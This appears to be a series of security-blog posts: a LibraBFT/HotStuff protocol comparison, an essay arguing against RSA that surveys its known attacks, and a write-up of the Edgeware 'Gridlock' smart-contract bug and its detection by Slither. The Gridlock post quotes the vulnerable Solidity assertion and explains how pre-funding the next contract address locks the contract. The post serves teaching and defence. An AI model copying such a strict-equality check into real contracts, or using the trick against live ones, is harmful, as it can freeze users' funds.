    &self,
    event_processor: ConcurrentEventProcessor,
    executor: TaskExecutor,
    ...
) {
    executor.spawn(Self::process_new_round_events(...)...);
    executor.spawn(Self::process_proposals(...)...);
    executor.spawn(Self::process_winning_proposals(...)...);
    executor.spawn(Self::process_block_retrievals(...)...);
    executor.spawn(Self::process_chunk_retrievals(...)...);
    executor.spawn(Self::process_votes(...)...);
    executor.spawn(Self::process_new_round_msg(...)...);
    executor.spawn(Self::process_outgoing_pacemaker_timeouts(...)...);
}

An excerpt of the “start_event_processing” function from Libra’s “chained_bft” module. Note that none of the calls seem to process something resembling a LibraBFT DataSyncNotification message.

The bottom line is that the LibraBFT liveness analysis does not directly apply to the LibraBFT source code in its present form. However, as mentioned above, LibraBFT is a work-in-progress. So, the existence of some discrepancies between the LibraBFT specification and the Libra source code is not surprising.

Communication complexity

As mentioned above in the description of HotStuff, HotStuff achieves linear authenticator complexity, where “an authenticator is either a partial signature or a signature” sent in a network message in a single round. What is LibraBFT’s authenticator complexity? It is unclear and somewhat ambiguous.

The LibraBFT paper does not mention “authenticator complexity” specifically, though it does claim that “LibraBFT has two desirable properties that BFT consensus protocols preceding HotStuff were not able to simultaneously support — linearity and responsiveness. … Informally, linearity guarantees that driving transaction commits incurs only linear communication…” (page 2). The claim is not addressed later in the paper. As we argue, LibraBFT’s authenticator complexity is at least O(n2), where n is the number of nodes. So, either the authors were not referring to authenticator complexity, or the claim is some sort of an oversight.

When a LibraBFT node believes that a round has gone on for too long, it broadcasts a timeout message to all other nodes. These timeout messages are signed. Therefore, LibraBFT’s authenticator complexity is at least O(n2).

How does LibraBFT’s use of broadcasts in state synchronization affect authenticator complexity?

State synchronization is parameterized by the minimum broadcast interval, 𝐼, mentioned above in the discussion of liveness analysis. The LibraBFT paper states that “nodes broadcast their states at least once per period of time 𝐼 > 0” (page 22). Taking this into account, the authenticator complexity of LibraBFT should be not just a function of n, but also of 𝐼.

However, the paper’s Appendix A.3 states “we have assumed that [data-synchronization messages] are transmitted over authenticated channels and omitted message signatures” (page 36). One could use this fact to argue that data synchronization does not affect authenticator complexity (though, that would feel a lot like cheating).

So, LibraBFT’s authenticator complexity is at least O(n2) due to its use of timeout broadcasts. It could be more, depending upon one’s assumptions about the network.

To be clear, this is a worst case analysis. In the common case, timeouts will not occur. Thus, if 𝐼 is large, say, many multiples of the typical round duration, then LibraBFT’s performance will be close to linear.

One final point is worth mentioning. HotStuff uses a predictable leader election strategy. As explained in the next section, the Libra authors are trying to avoid using such a strategy. To the best of our knowledge, no sub-quadratic adaptive leader election strategy currently exists. Thus, in comparing the communication complexity of HotStuff and LibraBFT, some increase may be unavoidable.

Leader election

At the time of this writing, the Libra source code’s leader election strategy is round-robin. However, the LibraBFT authors note that this strategy makes round leaders predictable, which facilitates denial-of-service attacks. In considering alternatives, the authors note that depending on hashes in a naive way could facilitate “grinding attacks,” e.g., where an attacker influences the hash in such a way as to increase the likelihood of a particular node being selected the leader.

To address the former problem and circumvent the latter, the authors state, “we intend to use a verifiable random function (VRF) in the future.” (In fact, a VRF is already implemented in the Libra source code, though it does not yet seem to be used.) In the next two paragraphs, we explain what VRFs are. Then, following a brief explanation of what it means for a LibraBFT block to be “committed,” we explain how LibraBFT’s proposed use of VRFs in leader elections is enabled by its use of broadcasts.

Intuitively, a VRF is a function that, given some input, produces two outputs: a random-looking value, and a proof that the value was derived from the input. The function is expected to have two properties. First, it should not be obvious how the random-looking value was derived from the input. Second, it should be possible to convince an observer that the random-looking value was derived from the input, even though that fact is not obvious. This latter property is made possible via the proof.

A simple example of a VRF is given in Section 4 of Goldberg, Reyzin, Papadopoulos, and Vcelak’s draft RFC. In that example, the random-looking value is an RSA signature computed over the hash of the input, and the proof is the hash. An observer can verify the proof by checking that the input has the hash, and that the signature corresponds to the hash. (Note: for production code, we recommend using the elliptic-curve-based VRF of Section 5 of the RFC, and not the RSA-based VRF of Section 4.)

We now briefly explain what it means for a LibraBFT block to be “committed.” In LibraBFT, blocks and quorum certificates alternate to form a chain:

B0 ← C0 ← B1 ← C1 ← B2 ← C2 ← ⋯

These blocks (certificates) need not be proposed (assembled) in contiguous rounds; there could be arbitrarily large gaps between them. A block is said to be “committed” when: (1) it appears below two other blocks, (2) all three blocks have associated quorum certificates, and (3) the blocks were proposed in contiguous rounds.

The reason for this rule is a bit technical. But, intuitively, a “committed” block is considered permanent by all non-faulty nodes. In contrast, a block that appears below fewer than two certified blocks is considered impermanent, and may have to be abandoned in favor of another block.

The LibraBFT authors intend to use VRFs in leader elections as follows. Each node will have its own instance of some VRF (e.g., a VRF instantiated with a private key belonging to the node). The leader for round i will be determined using the VRF instance of the round leader for the most recently committed block. That VRF instance will determine a seed for a pseudo-random function (PRF). The resulting PRF instance will then determine the leader for round i and each subsequent round until a new block becomes committed. The reason for using two functions like this is (we believe) so that round leaders can be determined even if the proposer of the most recently committed block goes offline.

We now explain how LibraBFT’s proposed use of VRFs in leader elections is enabled by its use of broadcasts. Or, more specifically, we explain why LibraBFT’s proposed use of VRFs would not work if a node could send a timeout message to just one other node, as is the case in HotStuff. The purpose of a timeout message is to tell the next round leader to start the next round. But, as we show in the next several paragraphs, who that next leader is can depend upon the cause of the timeout.

Suppose that in contiguous rounds i-2, i-1, and i, blocks Bm-2, Bm-1, and Bm are proposed. Further suppose that the leader for round i assembles a quorum certificate Cm and broadcasts it to all other nodes. Thus, at the start of round i+1, the most recently committed block is Bm-2:

B0 ← C0 ← ⋯ ← Bm-2 ← Cm-2 ← Bm-1 ← Cm-1 ← Bm ← Cm

But suppose that the leader for round i does not receive a block proposal for round i+1 within a reasonable timeframe. If the leader for round i could send a timeout message to just one other node, to whom should she send it? (Note that the leader for round i plays no special role in detecting or announcing the timeout of round i+1.)

Consider the following two explanations for why the leader for round i does not receive a block proposal for round i+1.

  • Case 1: The leader for round i+1 is faulty and never proposed a block. In this case, the most recently committed block at round i+2 is still Bm-2. Thus, the leader for round i+2 should be determined by the same PRF instance that determined the leader for round i+1. If the leader for round i could send a timeout message to just one other node, she should send it to the leader determined by this existing PRF instance.
  • Case 2: There is a network delay. The leader for round i+1 proposed a block and assembled a quorum certificate, but the leader for round i did not receive them in time. In this case, the most recently committed block at round i+2 is Bm-1. Thus, the leader for round i+2 should be determined by a new PRF instance, one seeded by the VRF instance belonging to the proposer of Bm-1. If the leader for round i could send a timeout message to just one other node, she should send it to the leader determined by this new PRF instance.

This ambiguity is resolved by having the leader for round i send its timeout message to all other nodes. We would not be surprised if the LibraBFT authors introduced timeout broadcasts to address this type of scenario specifically.

Finally, note that a similar problem does not exist in HotStuff. In HotStuff, the round leader is determined by “some deterministic mapping from view number to a replica, eventually rotating through all replicas,” and does not depend on the most recently committed block. On the other hand, the predictability of round leaders makes HotStuff susceptible to denial-of-service attacks, which the LibraBFT authors are trying to avoid.

LibraBFT and HotStuff are distinct algorithms

LibraBFT and HotStuff are very similar, but the two algorithms differ in some crucial respects. In LibraBFT, non-leaders perform broadcasts. The use of broadcasts in state synchronization makes it easier to establish a liveness result for LibraBFT. We suspect that timeout broadcasts were introduced to allow for the future use of an adaptive leader election mechanism, e.g., one based on VRFs. Despite these advantages, the additional broadcasts increase the algorithm’s communication complexity. However, this increase in communication complexity may be unavoidable.

We intend to keep a close eye on Libra. If you are developing a Libra application, please consider us for your security review.

Updated July 16, 2019.

Seriously, stop using RSA

Here at Trail of Bits we review a lot of code. From major open source projects to exciting new proprietary software, we’ve seen it all. But one common denominator in all of these systems is that for some inexplicable reason people still seem to think RSA is a good cryptosystem to use. Let me save you a bit of time and money and just say outright—if you come to us with a codebase that uses RSA, you will be paying for the hour of time required for us to explain why you should stop using it.

RSA is an intrinsically fragile cryptosystem containing countless foot-guns which the average software engineer cannot be expected to avoid. Weak parameters can be difficult, if not impossible, to check, and its poor performance compels developers to take risky shortcuts. Even worse, padding oracle attacks remain rampant 20 years after they were discovered. While it may be theoretically possible to implement RSA correctly, decades of devastating attacks have proven that such a feat may be unachievable in practice.

What is RSA again?

RSA is a public-key cryptosystem that has two primary use cases. The first is public key encryption, which lets a user, Alice, publish a public key that allows anyone to send her an encrypted message. The second use case is digital signatures, which allow Alice to “sign” a message so that anyone can verify the message hasn’t been tampered with. The convenient thing about RSA is that the signing algorithm is basically just the encryption algorithm run in reverse. Therefore for the rest of this post we’ll often refer to both as just RSA.

To set up RSA, Alice needs to choose two primes p and q that will generate the group of integers modulo N = pq. She then needs to choose a public exponent e and private exponent d such that ed = 1 mod (p-1)(q-1). Basically, e and d need to be inverses of each other.

Once these parameters have been chosen, another user, Bob, can send Alice a message M by computing C = Me (mod N). Alice can then decrypt the ciphertext by computing M = Cd (mod N). Conversely, if Alice wants to sign a message M, she computes S = Md (mod N), which any user can verify was signed by her by checking M = Se (mod N).

That’s the basic idea. We’ll get to padding—essential for both use cases—in a bit, but first let’s see what can go wrong during parameter selection.

Setting yourself up for failure

RSA requires developers to choose quite a few parameters during setup. Unfortunately, seemingly innocent parameter-selection methods degrade security in subtle ways. Let’s walk through each parameter choice and see what nasty surprises await those who choose poorly.

Prime Selection

RSA’s security is based off the fact that, given a (large) number N that’s the product of two primes p and q, factoring N is hard for people who don’t know p and q. Developers are responsible for choosing the primes that make up the RSA modulus. This process is extremely slow compared to key generation for other cryptographic protocols, where simply choosing some random bytes is sufficient. Therefore, instead of generating a truly random prime number, developers often attempt to generate one of a specific form. This almost always ends badly.

There are many ways to choose primes in such a way that factoring N is easy. For example, p and q must be globally unique. If p or q ever gets reused in another RSA moduli, then both can be easily factored using the GCD algorithm. Bad random number generators make this scenario somewhat common, and research has shown that roughly 1% of TLS traffic in 2012 was susceptible to such an attack. Moreover, p and q must be chosen independently. If p and q share approximately half of their upper bits, then N can be factored using Fermat’s method. In fact, even the choice of primality testing algorithm can have security implications.

Perhaps the most widely-publicized prime selection attack is the ROCA vulnerability in RSALib which affected many smartcards, trusted platform modules, and even Yubikeys. Here, key generation only used primes of a specific form to speed up computation time. Primes generated this way are trivial to detect using clever number theory tricks. Once a weak system has been recognized, the special algebraic properties of the primes allow an attacker to use Coppersmith’s method to factor N. More concretely, that means if the person sitting next to me at work uses a smartcard granting them access to private documents, and they leave it on their desk during lunch, I can clone the smartcard and give myself access to all their sensitive files.

It’s important to recognize that in none of these cases is it intuitively obvious that generating primes in such a way leads to complete system failure. Really subtle number-theoretic properties of primes have a substantial effect on the security of RSA. To expect the average developer to navigate this mathematical minefield severely undermines RSA’s safety.

Private Exponent

Since using a large private key negatively affects decryption and signing time, developers have an incentive to choose a small private exponent d, especially in low-power settings like smartcards. However, it is possible for an attacker to recover the private key when d is less than the 4th root of N. Instead, developers are encouraged to choose a large d such that Chinese remainder theorem techniques can be used to speed up decryption. However, this approach’s complexity increases the probability of subtle implementation errors, which can lead to key recovery. In fact, one of our interns last summer modelled this class of vulnerabilities with our symbolic execution tool Manticore.

People might call me out here and point out that normally when setting up RSA you first generate a modulus, use a fixed public exponent, and then solve for the private exponent. This prevents low private exponent attacks because if you always use one of the recommended public exponents (discussed in the next section) then you’ll never wind up with a small private exponent. Unfortunately this assumes developers actually do that. In circumstances where people implement their own RSA, all bets are off in terms of using standard RSA setup procedures, and developers will frequently do strange things like choose the private exponent first and then solve for the public exponent.

Public Exponent

Just as in the private exponent case, implementers want to use small public exponents to save on encryption and verification time. It is common to use Fermat primes in this context, in particular e = 3, 17, and 65537. Despite cryptographers recommending the use of 65537, developers often choose e = 3 which introduces many vulnerabilities into the RSA cryptosystem.

Developers have even used e = 1, which doesn’t actually encrypt the plaintext

When e = 3, or a similarly small number, many things can go wrong. Low public exponents often combine with other common mistakes to either allow an attacker to decrypt specific ciphertexts or factor N. For instance, the Franklin-Reiter attack allows a malicious party to decrypt two messages that are related by a known, fixed distance. In other words, suppose Alice only sends “chocolate” or “vanilla” to Bob. These messages will be related by a known value and allow an attacker Eve to determine which are “chocolate” and which are “vanilla.” Some low public exponent attacks even lead to key recovery. If the public exponent is small (not just 3), an attacker who knows several bits of the secret key can recover the remaining bits and break the cryptosystem. While many of these e = 3 attacks on RSA encryption are mitigated by padding, developers who implement their own RSA fail to use padding at an alarmingly high rate.

RSA signatures are equally brittle in the presence of low public exponents. In 2006, Bleichenbacher found an attack which allows attackers to forge arbitrary signatures in many RSA implementations, including the ones used by Firefox and Chrome. This means that any TLS certificate from a vulnerable implementation could be forged. This attack takes advantage of the fact that many libraries use a small public exponent and omit a simple padding verification check when processing RSA signatures. Bleichenbacher’s signature forgery attack is so simple that it is a commonly used exercise in cryptography courses.

Parameter Selection is Hard

The common denominator in all of these parameter attacks is that the domain of possible parameter choices is much larger than that of secure parameter choices. Developers are expected to navigate this fraught selection process on their own, since all but the public exponent must be generated privately. There are no easy ways to check that the parameters are secure; instead developers need a depth of mathematical knowledge that shouldn’t be expected of non-cryptographers. While using RSA with padding may save you in the presence of bad parameters, many people still choose to use broken padding or no padding at all.

Padding oracle attacks everywhere

As we mentioned above, just using RSA out of the box doesn’t quite work. For example, the RSA scheme laid out in the introduction would produce identical ciphertexts if the same plaintext were ever encrypted more than once. This is a problem, because it would allow an adversary to infer the contents of the message from context without being able to decrypt it. This is why we need to pad messages with some random bytes. Unfortunately, the most widely used padding scheme, PKCS #1 v1.5, is often vulnerable to something called a padding oracle attack.

Padding oracles are pretty complex, but the high-level idea is that adding padding to a message requires the recipient to perform an additional check–whether the message is properly padded. When the check fails, the server throws an invalid padding error. That single piece of information is enough to slowly decrypt a chosen message. The process is tedious and involves manipulating the target ciphertext millions of times to isolate the changes which result in valid padding. But that one error message is all you need to eventually decrypt a chosen ciphertext. These vulnerabilities are particularly bad because attackers can use them to recover pre-master secrets for TLS sessions. For more details on the attack, check out this excellent explainer.

The original attack on PKCS #1 v1.5 was discovered way back in 1998 by Daniel Bleichenbacher. Despite being over 20 years old, this attack continues to plague many real-world systems today. Modern versions of this attack often involves a padding oracle slightly more complex than the one originally described by Bleichenbacher, such as server response time or performing some sort of protocol downgrade in TLS. One particularly shocking example was the ROBOT attack, which was so bad that a team of researchers were able to sign messages with Facebook’s and PayPal’s secret keys. Some might argue that this isn’t actually RSA’s fault – the underlying math is fine, people just messed up an important standard several decades ago. The thing is, we’ve had a standardized padding scheme with a rigorous security proof, OAEP, since 1998. But almost no one uses it. Even when they do, OAEP is notoriously difficult to implement and often is vulnerable to Manger’s attack, which is another padding oracle attack that can be used to recover plaintext.

The fundamental issue here is that padding is necessary when using RSA, and this added complexity opens the cryptosystem up to a large attack surface. The fact that a single bit of information, whether the message was padded correctly, can have such a large impact on security makes developing secure libraries almost impossible. TLS 1.3 no longer supports RSA so we can expect to see fewer of these attacks going forward, but as long as developers continue to use RSA in their own applications there will be padding oracle attacks.

So what should you use instead?

People often prefer using RSA because they believe it’s conceptually simpler than the somewhat confusing DSA protocol or moon math elliptic curve cryptography (ECC). But while it may be easier to understand RSA intuitively, it lacks the misuse resistance of these other more complex systems.

First of all, a common misconception is that ECC is super dangerous because choosing a bad curve can totally sink you. While it is true that curve choice has a major impact on security, one benefit of using ECC is that parameter selection can be done publicly. Cryptographers make all the difficult parameter choices so that developers just need to generate random bytes of data to use as keys and nonces. Developers could theoretically build an ECC implementation with terrible parameters and fail to check for things like invalid curve points, but they tend to not do this. A likely explanation is that the math behind ECC is so complicated that very few people feel confident enough to actually implement it. In other words, it intimidates people into using libraries built by cryptographers who know what they’re doing. RSA on the other hand is so simple that it can be (poorly) implemented in an hour.

Second, any Diffie-Hellman based key agreement or signature scheme (including elliptic curve variants) does not require padding and therefore completely sidesteps padding oracle attacks. This is a major win considering RSA has had a very poor track record avoiding this class of vulnerabilities.

Trail of Bits recommends using Curve25519 for key exchange and digital signatures. Encryption needs to be done using a protocol called ECIES which combines an elliptic curve key exchange with a symmetric encryption algorithm. Curve25519 was designed to entirely prevent some of the things that can go wrong with other curves, and is very performant. Even better, it is implemented in libsodium, which has easy-to-read documentation and is available for most languages.

Seriously, stop using RSA

RSA was an important milestone in the development of secure communications, but the last two decades of cryptographic research have rendered it obsolete. Elliptic curve algorithms for both key exchange and digital signatures were standardized back in 2005 and have since been integrated into intuitive and misuse-resistant libraries like libsodium. The fact that RSA is still in widespread use today indicates both a failure on the part of cryptographers for not adequately articulating the risks inherent in RSA, and also on the part of developers for overestimating their ability to deploy it successfully.

The security community needs to start thinking about this as a herd-immunity problem—while some of us might be able to navigate the extraordinarily dangerous process of setting up or implementing RSA, the exceptions signal to developers that it is in some way still advisable to use RSA. Despite the many caveats and warnings on StackExchange and Github READMEs, very few people believe that they are the ones who will mess up RSA, and so they proceed with reckless abandon. Ultimately, users will pay for this. This is why we all need to agree that it is flat out unacceptable to use RSA in 2019. No exceptions.

Avoiding Smart Contract “Gridlock” with Slither

A denial-of-service (DoS) vulnerability, dubbed ‘Gridlock,’ was publicly reported on July 1st in one of Edgeware’s smart contracts deployed on Ethereum. As much as $900 million worth of Ether may have been processed by this contract. Edgeware has since acknowledged and fixed the “fatal bug.”

When we heard about Gridlock, we ran Slither on the vulnerable and fixed Edgeware contracts. Its publicly available dangerous-strict-equality detector correctly identifies the dangerous assertion in the vulnerable contract, and shows the absence of this vulnerability in the fixed contract.

This blog post details why this vulnerability is so subtle, the implementation details behind Slither’s dangerous-strict-equality detector that identified this vulnerability, and how Slither can help prevent developers from introducing such vulnerabilities in the future.

Strict Equality and DoS Vulnerability

The Gridlock vulnerability was identified in the snippet below. Upon discovery, the bug was acknowledged by the maintainers and a second version addressing the issue was deployed.

   /**
     * @dev        Locks up the value sent to contract in a new Lock
     * @param      term         The length of the lock up
     * @param      edgewareAddr The bytes representation of the target edgeware key
     * @param      isValidator  Indicates if sender wishes to be a validator
     */
    function lock(Term term, bytes calldata edgewareAddr, bool isValidator)
        external
        payable
        didStart
        didNotEnd
    {
        uint256 eth = msg.value;
        address owner = msg.sender;
        uint256 unlockTime = unlockTimeForTerm(term);
        // Create ETH lock contract
        Lock lockAddr = (new Lock).value(eth)(owner, unlockTime);
        // ensure lock contract has all ETH, or fail
        assert(address(lockAddr).balance == msg.value); // BUG
        emit Locked(owner, eth, lockAddr, term, edgewareAddr, isValidator, now);
    }

Specifically, the source of this vulnerability is the assertion which performs a strict equality check between the balance of the newly created Lock contract and the msg.value sent to this contract.

From the contract developer’s perspective, this assertion should hold. The new Lock contract was just created in the previous line. Also, it was credited with an Ether value equal to the msg.value sent as part of the current transaction.

However, this assumes that the newly created Lock contract address will have zero Ether balance before its creation. This is incorrect. Ether can be sent to contract addresses before the contracts are instantiated at those addresses. This is possible because Ethereum address generation is based on deterministic nonces.

The DoS attack consists of pre-calculating the next Lock contract address and sending some Wei to that address. This forces the lock() function to fail at the assertion in all future transactions, bringing the contract to a “Gridlock.”

The fix is to replace the assertion with the one below, where the strict equality ‘==’ is replaced by ‘>=’, accounting for Ether already present at the address of the new Lock contract being created.

assert(address(lockAddr).balance >= msg.value);

Avoiding strict equality to determine if an account has enough Ethers or tokens is a well-understood defensive programming technique in Solidity.

Slither’s Dangerous-Strict-Equality Detector

Slither has had a publicly available dangerous-strict-equality detector targeting this vulnerability since version 0.5.0, released on January 14th, 2019. We classify results from this detector as Medium impact and High confidence because strict equality is nearly always misused in logic fundamental to the operation of the contract. The results of this check are worth reviewing closely!

Running Slither on the Lockdrop.sol contract immediately identifies the vulnerable assertion:

$ slither --detect incorrect-equality Lockdrop.sol 
INFO:Detectors:
Lockdrop.lock(Lockdrop.Term,bytes,bool) (Lockdrop.sol#53-67) uses a dangerous strict equality:
        - assert(bool)(address(lockAddr).balance == msg.value)
Reference: https://github.com/crytic/slither/wiki/Detector-Documentation#dangerous-strict-equalities
INFO:Slither:Lockdrop.sol analyzed (2 contracts), 1 result(s) found

This detector is implemented using a lightweight taint analysis, where the tainted sources are program constructs with msg.value, now, block.number, block.timestamp, and the results of ERC token balanceOf() function calls. The taint sinks are expressions using strict equality comparisons, i.e., ‘==‘. The analysis works on Slither’s intermediate language representation, SlithIR, and tracks the propagation of tainted values across assignments and function calls. An alert is generated when the taint sinks have a data dependency on the tainted sources.

A simple textual search might have caught this vulnerability, but syntactic regular expressions would raise a fog of false alerts or miss it entirely. This is because of the many ways this vulnerability pattern can manifest, including across function calls and variable assignments. Hardcoding such a regular expression is challenging. Other security tools lack a detector for this vulnerability, or produce a substantial number of false positives. The lightweight semantic taint analysis enabled by SlithIR greatly improves this detector’s accuracy and reduces false positives.

In the case of the Lockdrop contract, Slither’s dangerous-strict-equality detector generates such an alert because msg.value and an address balance are used in a strict equality comparison within an assertion. This is a textbook example of a strict equality vulnerability which is caught effortlessly by Slither. We also verified that this alert is not present in the recently fixed code.

Crytic.io correctly identifies “Gridlock” in the Edgeware smart contracts

Besides this detector, Slither has 35 more that catch many Solidity smart contract vulnerabilities. They work together with 30 additional proprietary detectors in crytic.io, our continuous assurance system (think “Travis-CI but for Ethereum”). So, go ahead and give Slither a shot. We would love to hear about your experience, and welcome feedback.